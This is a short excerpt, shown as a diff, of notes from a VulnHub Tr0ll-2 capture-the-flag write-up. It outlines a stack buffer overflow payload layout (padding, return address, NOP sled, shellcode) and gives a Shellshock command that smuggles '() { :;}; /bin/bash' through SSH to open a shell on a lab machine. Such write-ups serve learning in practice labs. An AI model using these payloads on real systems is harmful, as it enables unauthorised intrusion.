zionspike/vulnhub-writeup/tr0ll-2/kapi-note.md

 ```

 Write an exploit.
 (A*268)(offset of shell)(nop sled)(shellcode)

 Even I found the position of esp was 0xbffffab0 but I could not use this offset as shell position.
-I have to shift plus or minut a little because when the binary was in debugging the memory was different.
+I have to increase or reduce offset a little because when the binary was in debugging the memory was different.
 ```
 root@AIRBUS:# ssh -i noob noob@192.168.159.134 '() { :;}; /bin/bash'
 cd /nothing_to_see_here/choose_wisely/door3